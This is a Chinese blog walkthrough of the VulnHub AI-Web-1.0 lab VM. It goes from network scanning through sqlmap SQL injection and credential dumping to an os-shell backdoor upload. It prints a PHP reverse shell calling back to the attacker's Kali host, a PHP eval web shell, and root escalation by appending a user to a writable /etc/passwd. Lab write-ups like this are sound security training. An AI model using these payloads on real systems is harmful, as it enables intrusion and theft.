VulnHub 靶机系列之AI-Web-1.0
反 2024-10-03 16:01:03 阅读 93
kali机下载地址(选择第一个下载,3G大小)
https://www.kali.org/get-kali/#kali-virtual-machines
靶机下载链接:
https://download.vulnhub.com/aiweb/AI-Web-1.0.7z
初次使用kali机的基础攻略(非新手小白跳过)
kali机的登录账号密码都是kali,登录进来后是这样:
首先第一步是可以调整背景,如果你不想要黑色的背景,可以换成其他的背景:
然后就是设置kali终端的背景和设置字体大小(推荐使用ctrl + shift + +号或是-号缩小放大字体),但是每次重新打开终端都会恢复系统原配置:
由于默认没有root密码,进行设置root账号的密码:如以下命令:
<code>┌──(kali㉿kali)-[~]
└─$ sudo passwd root
然后就是输入kali账号的密码kali,设置root密码就完成了:
为了后续学习更加方便,我们选择退出登录,使用root账号密码登录kali机:
这就是我完成Al-WEB-1.0靶场的kali机前期的配置。
信息收集
查看Kali Linux本机的IP地址(获得本机IP为192.168.200.130)
<code>──(root㉿kali)-[~]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.200.130 netmask 255.255.255.0 broadcast 192.168.200.255
inet6 fe80::e7e2:e104:ca:839f prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:bc:f3:3f txqueuelen 1000 (Ethernet)
RX packets 356 bytes 23058 (22.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34 bytes 4122 (4.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 16 bytes 960 (960.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 16 bytes 960 (960.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
发现同网段存活地址(我的环境是kali机和靶场都在NAT模式下)
┌──(root㉿kali)-[~]
└─# arp-scan 192.168.200.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:bc:f3:3f, IPv4: 192.168.200.130
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.200.1 00:50:56:c0:00:08 VMware, Inc.
192.168.200.2 00:50:56:fe:ad:16 VMware, Inc.
192.168.200.129 00:0c:29:b0:83:be VMware, Inc.
192.168.200.254 00:50:56:e0:6b:0c VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.088 seconds (122.61 hosts/sec). 4 responded
命令解析:
arp-scan :是一个用于网络扫描的工具,它通过发送 ARP(地址解析协议)请求来发现局域网内的设备。这些请求询问哪些设备拥有特定的 IP 地址,然后接收设备的 ARP 响应来确定哪些设备是活动的,并可以获取它们的 MAC 地址。
192.168.200.0/24 :指定了要扫描的 IP 地址范围。这个参数使用了 CIDR(无类别域间路由)表示法来指定一个 IP 地址段。
获取靶场IP地址:
通过查看Al-WEN-1.0靶场虚拟机得知其MAC地址:
从而得到靶场的IP地址为192.168.200.129
查看AI-Web-1.0靶场安装的服务及操作系统版本
使用命令:nmap -sS -sV -T4 -A -p- 192.168.200.129
<code>(root㉿kali)-[~]
└─# nmap -sS -sV -T4 -A -p- 192.168.200.129
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 22:41 EDT
Nmap scan report for 192.168.200.129
Host is up (0.00049s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
| http-robots.txt: 2 disallowed entries
|_/m3diNf0/ /se3reTdir777/uploads/
|_http-server-header: Apache
|_http-title: AI Web 1.0
MAC Address: 00:0C:29:B0:83:BE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.49 ms 192.168.200.129
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.43 seconds
命令解析:
nmap:是一个开源的网络扫描和安全审计工具
-sS:这个选项告诉 nmap 使用 TCP SYN 扫描技术。SYN 扫描是一种快速的扫描方式,它发送一个 SYN 包到目标端口,然后等待响应。如果收到 SYN-ACK 响应,它就知道端口是开放的;如果收到 RST(复位)响应,就知道端口是关闭的。这种扫描方式通常比全连接扫描更快,因为它不需要完成 TCP 三次握手的所有步骤
-sV:这个选项让 nmap 尝试确定目标机器上运行的服务版本
-T4:这个选项设置扫描的时间模板。-T4 表示“激进”模式,它会增加扫描的速度,但同时可能会增加被目标主机检测到扫描活动的风险。
-A:这个选项启用操作系统检测(OS detection)和脚本扫描(script scanning)。它试图通过发送一系列探测包到目标机器并分析响应来确定目标机器的操作系统类型。
-p-:这个选项告诉 nmap 扫描目标机器上的所有端口(从 1 到 65535)
从以上命令返回信息得知:
①靶场开放的端口:80
② HTTP 服务是由 Apache HTTP Server提供
③操作系统:Linux 3.2 - 4.9
④web服务的信息–robots.txt目录,html 头部,服务头部…
访问Web服务
浏览器访问:http://192.168.200.129
得到返回内容:Not even Google search my contents!没有什么有用的信息!
对Web服务器的目录扫描操作
dirb http://192.168.200.129
<code>┌──(root㉿kali)-[~]
└─# dirb http://192.168.200.129
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Sep 9 23:25:41 2024
URL_BASE: http://192.168.200.129/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.200.129/ ----
+ http://192.168.200.129/index.html (CODE:200|SIZE:141)
+ http://192.168.200.129/robots.txt (CODE:200|SIZE:82)
+ http://192.168.200.129/server-status (CODE:403|SIZE:222)
-----------------
END_TIME: Mon Sep 9 23:25:44 2024
DOWNLOADED: 4612 - FOUND: 3
从上面命令返回的结果得到了两个可以进行访问的URL
http://192.168.200.129/robots.txt
http://192.168.200.129/server-status
命令解析:
dirb:是一个基于字典的Web目录扫描工具,通过发送HTTP请求并分析服务器的响应来查找目标Web服务器上存在的目录和文件。
http://192.168.200.129:这是要扫描的目标网站的URL或IP地址,前面需要加上http://或https://。
访问得到的文件及目录
http://192.168.200.129/robots.txt
http://192.168.200.129/server-status
访问robots.txt下的给出的两个目录的Web路径
http://192.168.200.129/m3diNf0/
http://192.168.200.129/se3reTdir777/uploads/
均被禁止了,得不到有用的信息
继续扫描目标Web服务器上的子目录
dirb http://192.168.200.129/m3diNf0/
<code>┌──(root㉿kali)-[~]
└─# dirb http://192.168.200.129/m3diNf0/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Sep 9 23:55:30 2024
URL_BASE: http://192.168.200.129/m3diNf0/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.200.129/m3diNf0/ ----
+ http://192.168.200.129/m3diNf0/info.php (CODE:200|SIZE:84275)
-----------------
END_TIME: Mon Sep 9 23:55:33 2024
DOWNLOADED: 4612 - FOUND: 1
得到可访问路径:
http://192.168.200.129/m3diNf0/info.php
显示 靶场PHP 环境的配置信息以及当前服务器上安装的 PHP 版本和其他相关模块的详细信息。
通过仔细浏览这些信息,找到了:
web的绝对路径:/home/www/html/web1x443290o2sdf92213
dirb http://192.168.200.129/se3reTdir777/uploads/
<code>─(root㉿kali)-[~]
└─# dirb http://192.168.200.129/se3reTdir777/uploads/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Sep 10 00:01:32 2024
URL_BASE: http://192.168.200.129/se3reTdir777/uploads/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.200.129/se3reTdir777/uploads/ ----
-----------------
END_TIME: Tue Sep 10 00:01:35 2024
DOWNLOADED: 4612 - FOUND: 0
没得到可访问的URL
继续扫描父目录
dirb http://192.168.200.129/se3reTdir777/
──(root㉿kali)-[~]
└─# dirb http://192.168.200.129/se3reTdir777/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Sep 10 00:03:22 2024
URL_BASE: http://192.168.200.129/se3reTdir777/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.200.129/se3reTdir777/ ----
+ http://192.168.200.129/se3reTdir777/index.php (CODE:200|SIZE:53)
==> DIRECTORY: http://192.168.200.129/se3reTdir777/uploads/
---- Entering directory: http://192.168.200.129/se3reTdir777/uploads/ ----
-----------------
END_TIME: Tue Sep 10 00:03:28 2024
DOWNLOADED: 9224 - FOUND: 1
得到可访问的URL:
http://192.168.200.129/se3reTdir777/index.php
这是一个根据用户ID查看信息的入口
进行输入数据测试后,有学习过DVWA应用内容的话,可以判断出靶场的WEB漏洞是SQL注入(数据库注入)
<code>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
# 返回SQL语法报错,语句未正常闭合
# 相当于SELECT * FROM table_name WHERE column_name = '1' AND another_column = 'value;
value就是我们输入的1',右边没有闭合!!!
漏洞利用
这里在192.168.200.129/se3reTdir777/index.php页面中键盘按F12进行抓包
推荐设置浏览器为proxy代理,使用kali自带的抓包工具bursuite(可以检索出更细节的内容)
proxy代理:Proxy代理是一种特殊的网络服务,允许客户端通过非直接的方式与目标服务器进行连接。
工作原理:当客户端需要访问某个目标服务器时,它会先将请求发送给Proxy代理服务器,这里使用proxy代理,让bursuite软件可以抓到包(获取资源)
打开bursuite软件
这里不仅获取到请求包–包括需要的注入点,右边还有服务器的响应包。
利用SQLMap测试数据库注入
获取数据库(跑库)
sqlmap -u “http://192.168.200.129/se3reTdir777/index.php/” -data “uid=1&Operation=Submit” --dbs
<code># 返回的主要信息
[00:42:28] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[00:42:28] [INFO] fetching database names
available databases [2]:
[*] aiweb1
[*] information_schema
[00:42:28] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'
[*] ending @ 00:42:28 /2024-09-10/
从返回的信息得到数据库有aiweb1和information_schema;后面就可以利用数据库得到库中表,表中的列,字段了;
命令解析:
sql:是一个自动化的 SQL 注入工具,它可以发现并利用数据库中的安全漏洞
u “http://192.168.200.129/se3reTdir777/index.php/”:指定了要测试的 URL
-data “uid=1&Operation=Submit”:指定了 POST 请求的数据,这告诉 sqlmap 使用这些数据作为 POST 请求的一部分发送到服务器。
–dbs:这个选项让 sqlmap 尝试枚举后端数据库的名称。
获取表(跑表)
sqlmap -u “http://192.168.200.129/se3reTdir777/index.php/” -data “uid=1&Operation=Submit” -D aiweb1 --tables
# 得到主要内容
---
[00:50:44] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[00:50:44] [INFO] fetching tables for database: 'aiweb1'
Database: aiweb1
[2 tables]
+------------+
| user |
| systemUser |
+------------+
[00:50:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'
这里获取到了aiweb1数据库中的两个表user和systemUser
跑另一个数据库的表:
sqlmap -u “http://192.168.200.129/se3reTdir777/index.php/” -data “uid=1&Operation=Submit” -D information_schema --tables
# 这里得到60多个表,观察名称后,得不出很有用的信息
[00:55:07] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[00:55:07] [INFO] fetching tables for database: 'information_schema'
Database: information_schema
[61 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMN_PRIVILEGES |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET |
| INNODB_FT_BEING_DELETED |
| INNODB_FT_CONFIG |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED |
| INNODB_FT_INDEX_CACHE |
| INNODB_FT_INDEX_TABLE |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_METRICS |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_DATAFILES |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESPACES |
| INNODB_SYS_TABLESTATS |
| INNODB_SYS_VIRTUAL |
| INNODB_TEMP_TABLE_INFO |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| OPTIMIZER_TRACE |
| PARAMETERS |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| USER_PRIVILEGES |
| VIEWS |
| COLUMNS |
| ENGINES |
| EVENTS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| TABLES |
| TRIGGERS |
+---------------------------------------+
[00:55:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'
[*] ending @ 00:55:07 /2024-09-10/
所以后面跑列,使用aiweb1数据库的表进行
获取表中列信息(跑列)
sqlmap -u “http://192.168.200.129/se3reTdir777/index.php/” -data “uid=1&Operation=Submit” -D aiweb1 -T user --columns
---
[00:58:28] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[00:58:28] [INFO] fetching columns for table 'user' in database 'aiweb1'
Database: aiweb1
Table: user
[3 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| firstName | varchar(25) |
| id | int(11) |
| lastName | varchar(25) |
+-----------+-------------+
[00:58:28] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'
这里获取到了列firstName,id,lastName
sqlmap -u “http://192.168.200.129/se3reTdir777/index.php/” -data “uid=1&Operation=Submit” -D aiweb1 -T systemUser --columns
---
[01:00:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[01:00:21] [INFO] fetching columns for table 'systemUser' in database 'aiweb1'
Database: aiweb1
Table: systemUser
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(11) |
| password | varchar(50) |
| userName | varchar(25) |
+----------+-------------+
[01:00:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'
这里居然获取到了password和userName列,难道是账号密码?继续跑行
跑行
sqlmap -u “http://192.168.200.129/se3reTdir777/index.php/” -data “uid=1&Operation=Submit” -D aiweb1 -T user -C firstName,id,lastName --dump
---
[01:04:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[01:04:21] [INFO] fetching entries of column(s) 'firstName,id,lastName' for table 'user' in database 'aiweb1'
Database: aiweb1
Table: user
[3 entries]
+-----------+----+----------+
| firstName | id | lastName |
+-----------+----+----------+
| admin | 1 | admin |
| root | 2 | root |
| mysql | 3 | mysql |
+-----------+----+----------+
[01:04:21] [INFO] table 'aiweb1.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.200.129/dump/aiweb1/user.csv'
[01:04:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'
[*] ending @ 01:04:21 /2024-09-10/
###得到3个用户admin、root和mysql
sqlmap -u “http://192.168.200.129/se3reTdir777/index.php/” -data “uid=1&Operation=Submit” -D aiweb1 -T systemUser -C id,password,userName --dump
atabase: aiweb1
Table: systemUser
[3 entries]
+----+----------------------------------------------+-----------+
| id | password | userName |
+----+----------------------------------------------+-----------+
| 1 | RmFrZVVzZXJQYXNzdzByZA== | t00r |
| 2 | TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== | aiweb1pwn |
| 3 | TjB0VGhpczBuZUFsczA= | u3er |
+----+----------------------------------------------+-----------+
[01:06:01] [INFO] table 'aiweb1.systemUser' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.200.129/dump/aiweb1/systemUser.csv'
[01:06:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'
这里居然得到了账户和密码,但是密码一看就是加密过的!经过查询发现是Base64加密!!
使用这个网址对密文解密:https://www.cmd5.com/
+----+----------------------------------------------+-----------+
| id | password | userName |
+----+----------------------------------------------+-----------+
| 1 | FakeUserPassw0rd | t00r |
| 2 | MyEvilPass_f908sdaf9_sadfasf0sa | aiweb1pwn |
| 3 | N0tThis0neAls0 | u3er |
+----+----------------------------------------------+-----------
经过测试,完全登录不了!!
但是前面我们已经得知web服务的绝对路径是: /home/www/html/web1x443290o2sdf92213
我们可以获取靶场的os-shell
得到os-shell
sqlmap -u “http://192.168.200.129/se3reTdir777/index.php/” -data “uid=1&Operation=Submit” --os-shell
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://192.168.200.129/se3reTdir777/index.php/" -data "uid=1&Operation=Submit" --os-shell
___
__H__
___ ___[.]_____ ___ ___ { 1.8.5#stable}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:15:13 /2024-09-10/
[01:15:13] [INFO] resuming back-end DBMS 'mysql'
[01:15:13] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uid=1' OR NOT 1031=1031#&Operation=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uid=1' AND GTID_SUBSET(CONCAT(0x7178707171,(SELECT (ELT(9269=9269,1))),0x7176627071),9269)-- kGXT&Operation=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 2452 FROM (SELECT(SLEEP(5)))PAiH)-- ViEd&Operation=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: uid=1' UNION ALL SELECT CONCAT(0x7178707171,0x694f46677062746b756556595347586349546f4d4c54776e6777754654494b4747526d586f486b6e,0x7176627071),NULL,NULL#&Operation=Submit
---
[01:15:13] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[01:15:13] [INFO] going to use a web backdoor for command prompt
[01:15:13] [INFO] fingerprinting the back-end DBMS operating system
[01:15:13] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n
[01:15:26] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
2
please provide a comma separate list of absolute directory paths: /home/www/html/web1x443290o2sdf92213
[01:15:45] [WARNING] unable to automatically parse any web server path
[01:15:45] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/' via LIMIT 'LINES TERMINATED BY' method
[01:15:45] [WARNING] unable to upload the file stager on '/home/www/html/web1x443290o2sdf92213/'
[01:15:45] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/' via UNION method
[01:15:45] [WARNING] expect junk characters inside the file as a leftover from UNION query
[01:15:45] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[01:15:45] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/index.php/' via LIMIT 'LINES TERMINATED BY' method
[01:15:45] [WARNING] unable to upload the file stager on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/index.php/'
[01:15:45] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/index.php/' via UNION method
[01:15:45] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[01:15:45] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 22 times
[01:15:45] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'
[*] ending @ 01:15:45 /2024-09-10/
┌──(root㉿kali)-[~]
└─#
选项选择就选4 n 2
上面信息返回信息,使用web服务的绝对路径后,没有获取到os-shell
后续查找资料得到填写的路径为:
/home/www/html/web1x443290o2sdf92213//se3reTdir777/uploads/
原因是uploads是一个可以允许上传文件的目录
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://192.168.200.129/se3reTdir777/index.php/" -data "uid=1&Operation=Submit" --os-shell
___
__H__
___ ___[)]_____ ___ ___ { 1.8.5#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:19:08 /2024-09-10/
[01:19:08] [INFO] resuming back-end DBMS 'mysql'
[01:19:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uid=1' OR NOT 1031=1031#&Operation=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uid=1' AND GTID_SUBSET(CONCAT(0x7178707171,(SELECT (ELT(9269=9269,1))),0x7176627071),9269)-- kGXT&Operation=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 2452 FROM (SELECT(SLEEP(5)))PAiH)-- ViEd&Operation=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: uid=1' UNION ALL SELECT CONCAT(0x7178707171,0x694f46677062746b756556595347586349546f4d4c54776e6777754654494b4747526d586f486b6e,0x7176627071),NULL,NULL#&Operation=Submit
---
[01:19:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[01:19:08] [INFO] going to use a web backdoor for command prompt
[01:19:08] [INFO] fingerprinting the back-end DBMS operating system
[01:19:09] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n
[01:19:11] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: /home/www/html/web1x443290o2sdf92213//se3reTdir777/uploads/
[01:19:14] [WARNING] unable to automatically parse any web server path
[01:19:14] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' via LIMIT 'LINES TERMINATED BY' method
[01:19:14] [INFO] the file stager has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.200.129:80/se3reTdir777/uploads/tmpungyo.php
[01:19:14] [INFO] the backdoor has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.200.129:80/se3reTdir777/uploads/tmpbabky.php
[01:19:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
os-shell获取成功
但是由于os-shell不稳定,且是低权限的shell,我们进行权限提升
权限提升
制作木马文件并上传
制作木马文件
方式一:
木马文件编写
<?php $sock=fsockopen("192.168.200.128",4567); exec("/bin/sh -i <&3 >&3 2>&3"); ?>┌──(root㉿kali)-[~]
└─# cat shell.php
<?php
$sock=fsockopen("192.168.200.130",4567);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
使用python搭建一个简易的http服务器
──(root㉿kali)-[~]
└─# python -m http.server 9875
Serving HTTP on 0.0.0.0 port 9875 (http://0.0.0.0:9875/) ...
本机浏览器访问
os-shell执行命令:wget http://192.168.200.130:9875/shell.php
<code>os-shell> wget http://192.168.200.130:9875/shell.php
do you want to retrieve the command standard output? [Y/n/a] y
No output
os-shell> wget http://192.168.200.130:9875/shell.php
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
--2024-09-10 05:29:41-- http://192.168.200.130:9875/shell.php
Connecting to 192.168.200.130:9875... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84 [application/octet-stream]
Saving to: 'shell.php'
0K 100% 35.8M=0s
2024-09-10 05:29:41 (35.8 MB/s) - 'shell.php' saved [84/84]
---
os-shell> ls
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
shell.php
tmpbabky.php
tmpungyo.php
---
由于os-shell不稳定,如果返回No output多使用几次命令
开启端口监听
kaili机:nc -lvp 4567
然后os-shell输入php shell.php
获取成功
方式二:
木马文件编写内容
编写shell.php文件,内容如下
<?php @eval($_POST["cmd"]) ?>
然后使用kali机使用命令:
sqlmap -u “http://192.168.200.129/se3reTdir777/index.php/” -data “uid=1&Operation=Submit” --file-write ./shell.php --file-dest
上传至靶场中;
后续监听操作与方式一相同(或者可以使用蚁剑)
python转换成交互式shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
然后进行"三剑客操作"
whoami:当前用户
id:用户id、,所属组,所属组id
pwd:当前目录
##uname -a(Linux系统):查看内核
<code></web1x443290o2sdf92213/se3reTdir777/uploads$ whoami
www-data
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ uname -a
<eb1x443290o2sdf92213/se3reTdir777/uploads$ uname -a
Linux aiweb1 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ pwd
<tml/web1x443290o2sdf92213/se3reTdir777/uploads$ pwd
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads
通过使用find / -name flag*命令查找flag,没有返回,说明需要更高的权限!!!
通过命令 ls -al /etc/passwd,发现当前用户居然可以写入内容进/etc/passwd!!!
这就是SetUID漏洞,如果要防守就将/etc/passwd权限改为只有root用户或是其他管理员用户才可以写入数据!!!
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ ls -al /etc/passwd
<o2sdf92213/se3reTdir777/uploads$ ls -al /etc/passwd
-rw-r--r-- 1 www-data www-data 1664 Aug 21 2019 /etc/passwd
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$
创建用户
openssl passwd -1 -salt bpz 123456
命令解析:
openssl passwd : 这是 OpenSSL 工具集中的一个命令,用于生成密码的加密(哈希)字符串。
-1 : 这个选项指定使用 MD5 算法来加密密码
-salt : 这个选项用于为加密过程提供一个“盐”(salt)。盐是一个随机或指定的字符串,用于与密码一起加密,以增加加密结果的复杂性和唯一性。在这个例子中,bpz 被用作盐值
bpz 123456 : 账号和密码
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ openssl passwd -1 -salt bpz 123456
<Tdir777/uploads$ openssl passwd -1 -salt bpz 123456
$1$bpz$kTc/7rHp3uTJ2ou1W2Z/F1
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ echo 'bpz:$1$bpz$kTc/7rHp3uTJ2ou1W2Z/F1:0:0::/root:/bin/bash'>>/etc/passwd
<Hp3uTJ2ou1W2Z/F1:0:0::/root:/bin/bash'>>/etc/passwd
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$
创建用户成功后,返回的密文写入进/etc/passwd
使用bpz用户登录,获取flag
登录
su bpz
123456
查找flag存在的路径
find / -name flag*
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ su bpz
</web1x443290o2sdf92213/se3reTdir777/uploads$ su bpz
Password: 123456
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads#
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# find / -name flag*
<o2sdf92213/se3reTdir777/uploads# find / -name flag*
/usr/src/linux-headers-4.15.0-58/scripts/coccinelle/locks/flags.cocci
/usr/src/linux-headers-4.15.0-58-generic/include/config/arch/uses/high/vma/flags.h
/sys/kernel/debug/block/loop7/hctx0/flags
